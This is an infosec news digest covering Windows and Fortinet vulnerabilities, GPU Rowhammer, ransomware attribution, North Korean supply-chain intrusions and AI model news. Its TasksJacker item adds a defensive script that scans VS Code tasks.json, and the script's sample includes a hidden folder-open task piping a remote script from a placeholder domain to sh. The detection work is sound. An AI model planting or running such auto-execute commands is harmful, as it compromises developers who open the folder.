InfoSec News 07APR2026
General
- New zero-day Elevation of Privilege (EoP) vulnerability in Microsoft Windows, dubbed BlueHammer. Looking at the exploit's source code, it appears to hook Windows Defender's update process, wait for it to create a new directory, move its own files into that directory, then trigger a detection with the EICAR test file.
Will Dormann, principal vulnerability analyst at Tharros (formerly Analygence), confirmed to BleepingComputer that the BlueHammer exploit works, saying that the flaw is a local privilege escalation (LPE) that combines a TOCTOU (time-of-check to time-of-use) and a path confusion.
He explained that the issue is not easy to exploit and that it gives a local attacker access to the Security Account Manager (SAM) database, which contains password hashes for local accounts.
Given this access, attackers can escalate to SYSTEM privileges and potentially achieve complete machine compromise.
- https://www.bleepingcomputer.com/news/security/disgruntled-researcher-leaks-bluehammer-windows-zero-day-exploit/
- https://deadeclipse666.blogspot.com/
- https://github.com/Nightmare-Eclipse/BlueHammer
- Fortinet dropped a fun gift for poor Fortinet admins, and they're definitely not trying to hide the disclosure by dropping it during a long weekend. This is the second CVSS 9.8 vulnerability in FortiClient EMS in two weeks.
An Improper Access Control vulnerability [CWE-284] in FortiClient EMS may allow an unauthenticated attacker to execute unauthorized code or commands via crafted requests.
Fortinet has observed this to be exploited in the wild and urges vulnerable customers to install the hotfix for FortiClient EMS.
- https://fortiguard.fortinet.com/psirt/FG-IR-26-099
- https://nvd.nist.gov/vuln/detail/CVE-2026-35616
- https://nvd.nist.gov/vuln/detail/CVE-2026-21643
- https://x.com/DefusedCyber/status/2040315969159995847
- https://www.bleepingcomputer.com/news/security/new-fortinet-forticlient-ems-flaw-cve-2026-35616-exploited-in-attacks/
- https://therecord.media/singapore-us-warn-of-fortinet-bug-exploited
- https://www.theregister.com/2026/04/06/forticlient_ems_bug_exploited/
- Rowhammer, the technique of flipping bits in adjacent memory rows by repeatedly accessing (hammering) a target row, comes to Graphics Processing Units (GPUs), in the form of GPUBreach.
The researchers demonstrated that Rowhammer-induced bit flips in GDDR6 can corrupt GPU page tables (PTEs) and grant arbitrary GPU memory read/write access to an unprivileged CUDA kernel.
An attacker may then chain this into a CPU-side escalation by exploiting memory-safety bugs in the NVIDIA driver, potentially leading to complete system compromise without the need to disable Input-Output Memory Management Unit (IOMMU) protection.
- https://gpubreach.ca/
- https://www.bleepingcomputer.com/news/security/new-gpubreach-attack-enables-system-takeover-via-gpu-rowhammer/
- https://arstechnica.com/security/2026/04/new-rowhammer-attacks-give-complete-control-of-machines-running-nvidia-gpus/
- Brian Krebs has a new article on the identification of "UNKN" - a key figure in both GandCrab and REvil.
Shchukin was named as UNKN (a.k.a. UNKNOWN) in an advisory published by the German Federal Criminal Police (the “Bundeskriminalamt” or BKA for short).
...
Germany’s BKA said Shchukin acted as the head of one of the largest worldwide operating ransomware groups GandCrab and REvil, which pioneered the practice of double extortion — charging victims once for a key needed to unlock hacked systems, and a separate payment in exchange for a promise not to publish stolen data.
...
The Gandcrab ransomware affiliate program first surfaced in January 2018, and paid enterprising hackers huge shares of the profits just for hacking into user accounts at major corporations.
...
On May 31, 2019, the GandCrab team announced the group was shutting down after extorting more than $2 billion from victims.
...
The REvil ransomware affiliate program materialized around the same time as GandCrab's demise, fronted by a user named UNKNOWN.
...
A reader forwarded this English-dubbed audio recording from a ccc.de (37C3) conference talk in Germany from 2023 that previously outed Shchukin as the REvil leader (Shchukin is mentioned at around 24:25).
- https://krebsonsecurity.com/2026/04/germany-doxes-unkn-head-of-ru-ransomware-gangs-revil-gandcrab/
- https://therecord.media/german-police-unmask-suspects-linked-revil-gandcrab
- Interesting move from the Commonwealth Bank (CBA) - customer identity verification can now use the NFC chip in a passport.
The NFC scanning lets the bank onboard customers with a single document.
...
For the verification, the ePassport biometric, the chip photo, is matched against a customer selfie during onboarding, and neither image is retained.
...
While the technology is emerging in the Australian market, overseas retail banks have used NFC ePassport scanning for KYC onboarding for several years now.
- The axios npm package hack appears to have started with a fake Microsoft Teams error message that tricked the maintainer into installing a RAT. The attack has been attributed to North Korea.
They scheduled a meeting with me to connect. The meeting was on MS Teams. The meeting had what seemed to be a group of people that were involved.
The meeting said something on my system was out of date. I installed the missing item as I presumed it was something to do with Teams, and this was the RAT.
- https://github.com/axios/axios/issues/10636#issuecomment-4180237789
- https://www.bleepingcomputer.com/news/security/axios-npm-hack-used-fake-teams-error-fix-to-hijack-maintainer-account/
- The Drift Protocol (crypto-currency platform) have published some early results from the investigation into the ~US$280m hack. The attack has been attributed to North Korea.
In or about Fall 2025, Drift contributors were approached by a group of individuals at a major crypto conference who presented as a quantitative trading firm looking to integrate on the protocol. It is now understood that this appears to be a targeted approach, where individuals from this group continued to deliberately seek out and engage specific Drift contributors, in person, at multiple major industry conferences in multiple countries over the following six months.
...
Integration conversations continued through February and March 2026. Various Drift contributors met individuals from this group again, face-to-face, at multiple major industry conferences.
...
Throughout all of this, links were shared for projects, tools, and apps they claimed to be building, which was standard practice for trading firms.
...
One contributor may have been compromised after cloning a code repository shared by the group under the guise of deploying a frontend for their vault.
A second contributor was induced to download a TestFlight application the group presented as their wallet product.
...
With medium-high confidence supported by investigations... this operation is assessed to have been carried out by the same threat actors responsible for the October 2024 Radiant Capital hack attributed by Mandiant to UNC4736, a North Korean state-affiliated group also tracked as AppleJeus or Citrine Sleet.
...
Mandiant has not formally attributed this Drift exploit.
- https://x.com/DriftProtocol/status/2040611161121370409
- https://www.bleepingcomputer.com/news/security/drift-280m-crypto-theft-linked-to-6-month-in-person-operation/
- https://therecord.media/drift-crypto-confirms-280-million-stolen-north-korea
- Possibly related to the above item (Drift compromise) - OpenSourceMalware have identified a technique used by North Korean threat actors to compromise VS Code users.
What makes TasksJacker novel isn't just its scale—it's the attack vector. By weaponizing VS Code's tasks.json auto-execution feature, attackers have created a scenario where simply opening a cloned repository in your IDE can compromise your system. No user interaction required beyond a git clone and opening the folder.
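As an added example (not code from OpenSourceMalware, the VS Code project, or the Drift investigation), the Python script below is the triage check a practitioner would want to run on a freshly cloned repository before opening the folder in VS Code: it parses .vscode/tasks.json and reports any task configured to launch automatically on folder open ("runOptions": {"runOn": "folderOpen"}), the command line it would execute, and whether the task hides its terminal ("presentation": {"reveal": "never"}). Those three keys are VS Code's own; the sample tasks.json is constructed for this example and cdn.example.invalid is a placeholder domain. tasks.json allows comments and trailing commas, so the parser strips those first.

```python
"""Triage a cloned repo's .vscode/tasks.json for tasks VS Code would launch
automatically when the folder is opened.  Added example for this digest, not
code from OpenSourceMalware or the VS Code project.  The sample below is a
constructed tasks.json; cdn.example.invalid is a placeholder domain."""
import json
import re
import sys
from pathlib import Path
from typing import Dict, List


def strip_jsonc(text: str) -> str:
    """tasks.json is JSON-with-comments: drop // and /* */ comments that sit
    outside string literals, then trailing commas before } or ].  (The
    trailing-comma pass is a regex, so a comma followed by ] or } inside a
    string would also be removed; fine for triage, not a general parser.)"""
    out: List[str] = []
    i, n, in_str = 0, len(text), False
    while i < n:
        ch = text[i]
        if in_str:
            out.append(ch)
            if ch == "\\" and i + 1 < n:   # keep the escaped character as-is
                out.append(text[i + 1])
                i += 1
            elif ch == '"':
                in_str = False
            i += 1
        elif ch == '"':
            in_str = True
            out.append(ch)
            i += 1
        elif text.startswith("//", i):     # line comment: skip to end of line
            nl = text.find("\n", i)
            i = n if nl == -1 else nl
        elif text.startswith("/*", i):     # block comment: skip past */
            end = text.find("*/", i + 2)
            i = n if end == -1 else end + 2
        else:
            out.append(ch)
            i += 1
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))


def find_autorun_tasks(tasks_json_text: str) -> List[Dict[str, object]]:
    """Return tasks with runOptions.runOn == "folderOpen", the command line
    each would execute, and whether the task hides its terminal panel."""
    doc = json.loads(strip_jsonc(tasks_json_text))
    hits: List[Dict[str, object]] = []
    for task in doc.get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        args = task.get("args") or []
        parts = [str(task.get("command", ""))] + [str(a) for a in args]
        hits.append({
            "label": task.get("label", "<unlabelled>"),
            "type": task.get("type", ""),
            "command": " ".join(p for p in parts if p),
            # reveal: "never" keeps the terminal closed while the task runs
            "hidden": (task.get("presentation") or {}).get("reveal") == "never",
        })
    return hits


def scan_repo(repo_dir: str) -> List[Dict[str, object]]:
    """Check a cloned repository's .vscode/tasks.json, if it has one."""
    path = Path(repo_dir) / ".vscode" / "tasks.json"
    if not path.is_file():
        return []
    return find_autorun_tasks(path.read_text(encoding="utf-8"))


# Constructed sample: one routine task and one that pipes a remote script to sh
# as soon as the folder is opened, with its terminal hidden.
SAMPLE_TASKS_JSON = r'''{
    // comments and trailing commas are legal in tasks.json
    "version": "2.0.0",
    "tasks": [
        {
            "label": "install deps",   /* looks routine */
            "type": "shell",
            "command": "npm",
            "args": ["install"],
        },
        {
            "label": "prepare env",
            "type": "shell",
            "command": "curl -fsSL https://cdn.example.invalid/setup.sh | sh",
            "runOptions": { "runOn": "folderOpen" },
            "presentation": { "reveal": "never" },
        },
    ],
}'''

if __name__ == "__main__":
    found = scan_repo(sys.argv[1]) if len(sys.argv) > 1 else find_autorun_tasks(SAMPLE_TASKS_JSON)
    for h in found:
        print(f"[{'hidden' if h['hidden'] else 'visible'}] {h['label']} ({h['type']}): {h['command']}")
    sys.exit(1 if found else 0)
```

Run it with the path of a clone as the argument (no argument runs it over the constructed sample); a non-zero exit means at least one task would fire on folder open. A detection script like this is a second line of defence: VS Code's Workspace Trust, which refuses to run tasks in a folder you have not marked trusted, is the control that actually blocks this vector, so the real lesson is not to trust a repository handed to you by a counterparty just because the integration conversation felt routine.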
- Another potential TeamPCP / ShinyLapsusHunters (specifically ShinyHunters this time) link. The European Commission's AWS tenancy breach is being attributed to TeamPCP (via the Trivy supply-chain compromise); however, ShinyHunters have claimed responsibility for stealing the data.
CERT-EU believes with high confidence that the hackers initially gained access through the Trivy supply chain compromise, which has been attributed to the hacking group TeamPCP.
...
The researchers believe the hack can be attributed to the Trivy compromise because of its timing, the resources that were targeted and the fact that the Commission was “unwittingly using a compromised version of Trivy during the relevant timeframe, having received it through normal software update channels.”
...
On March 28, the stolen data turned up on the ShinyHunters’ dark web site. The incident is likely the latest example of cybercriminal organizations working together to make money off of hacks.
Getting Techy
- WatchTowr Labs have been busy - this time digging into the fertile grounds of enterprise file-sharing platforms, with Progress ShareFile.
If you squint and look at the CISA KEV list, you might think it's made up exclusively of vulnerabilities in file transfer solutions.
While this would be wrong (and you shouldn’t squint, it’s bad for your eyes), file transfer solutions do play a decent role in the CISA KEV list due to how fondly threat actors, APT groups, and ransomware gangs alike perceive them.
...
In this post, we’ll walk through vulnerabilities we discovered in Progress ShareFile that allowed us to achieve pre-auth RCE on what was, at the time of research, fully patched to latest.
Geo-Politics
- [FR] France looks set to be the next country to implement a social-media ban for children - under-15s in this case.
The French Senate voted in favor of a social media ban for children under age 15, putting the country on track to potentially be the first European nation to follow Australia's lead in passing such a law.
...
The Senate bill is different and creates a system that divides platforms into two categories. One category would be designated for platforms believed to cause “physical, mental or moral development” to children. An outright ban would apply to those platforms.
The second category would be for platforms found to be less detrimental that can be used by children under 15 whose parents consent.
- [RU] A number of major services in Russia have suffered outages, and there are suggestions it may have been an own goal by Roskomnadzor.
The disruption on Friday affected apps from some of the country’s largest banks, including Sberbank, VTB, Alfa-Bank, T-Bank and Gazprombank.
...
The exact cause of the outage remains unclear, but several Russian media outlets, including Forbes Russia, initially suggested it could be linked to government attempts to block internet resources, specifically the blocking of IP addresses used in banking infrastructure.
...
Natalia Kasperskaya, co-founder of cybersecurity company Kaspersky Lab, wrote on Telegram on Saturday that she believed the issues were caused by Roskomnadzor’s attempts to block VPN services.
“This is not an enemy raid or an attack by external actors or malicious foreign hackers,” she wrote. “This is our very own Roskomnadzor finally getting serious about fighting traffic tunneling and protection services, also known as VPNs.”
- [US] More cuts to the Cybersecurity and Infrastructure Security Agency (CISA) budget. There can't be much left of the agency, and its ability to provide effective protection must be heavily degraded.
The US Cybersecurity and Infrastructure Security Agency's budget will see yet another deep cut if Congress approves President Trump's proposal to slash CISA's spending by $707 million in fiscal year 2027.
...
Trump's fiscal 2026 budget wanted to chop about $491 million from CISA's spending, although Congress ultimately approved a reduction of about $135 million.
...
Both Noem and Trump frequently criticized CISA's efforts to counter online disinformation, especially as they relate to election security and preventing foreign trolls – and the president himself – from spreading lies that the 2020 presidential election was stolen on behalf of Joe Biden.
...
On Trump's first day of his second term, he axed the Cyber Safety Review Board, which had been investigating how China's Salt Typhoon hacked US government and telecommunications networks, along with all other advisory committees that reported to the Department of Homeland Security.
Privacy
- Microsoft's LinkedIn is scanning visitors' browsers for thousands of extensions. It claims to be doing this to prevent extensions from scraping the site.
LinkedIn does not dispute that it detects specific browser extensions, telling BleepingComputer that the info is used to protect the platform and its users.
However, the company claims the report is from someone whose account was banned for scraping LinkedIn content and violating the site's terms of use.
...
Regardless of the reasons for the report, one point is undisputed.
LinkedIn's site uses a fingerprinting script that detects over 6,000 extensions running in a Chromium browser, along with other data about a visitor's system.
AI
- Google DeepMind have released the next iteration of their Gemma series of models, Gemma 4. They come in a range of sizes: Effective 2B (E2B), Effective 4B (E4B), 31B dense, and a 26B Mixture of Experts (MoE) with 4B active parameters. The MoE model should be quite quick to run for its size. The smaller models (E2B/E4B) have a 128k-token context window; the larger models (26B/31B) have a 256k-token context window.
The quoted benchmarks appear to be quite a step up from Gemma 3, including LiveCodeBench, from 29% to 80% (even the E2B scores 44%).
Google have also released an app to run the smaller models directly on iPhones.
We are releasing Gemma 4 in four versatile sizes: Effective 2B (E2B), Effective 4B (E4B), 26B Mixture of Experts (MoE) and 31B Dense. The entire family moves beyond simple chat to handle complex logic and agentic workflows. Our larger models deliver state-of-the-art performance for their sizes, with the 31B model currently ranking as the #3 open model in the world on the industry-standard Arena AI text leaderboard, and the 26B model securing the #6 spot. There, Gemma 4 outcompetes models 20x its size.
- https://blog.google/innovation-and-ai/technology/developers-tools/gemma-4/
- https://storage.googleapis.com/gweb-uniblog-publish-prod/documents/gemma-4-table_light_Web_with_Arena.jpg
- https://simonwillison.net/2026/Apr/2/gemma-4/
- https://simonwillison.net/2026/Apr/6/google-ai-edge-gallery/
- https://apps.apple.com/us/app/google-ai-edge-gallery/id6749645337
- Surprise: the vibe-coded OpenClaw app had a bunch of vulnerabilities.
Earlier this week, OpenClaw developers released security patches for three high-severity vulnerabilities. The severity rating of one in particular, CVE-2026-33579, is rated from 8.1 to 9.8 out of a possible 10 depending on the metric used—and for good reason. It allows anyone with pairing privileges (the lowest-level permission) to gain administrative status. With that, the attacker has control of whatever resources the OpenClaw instance does.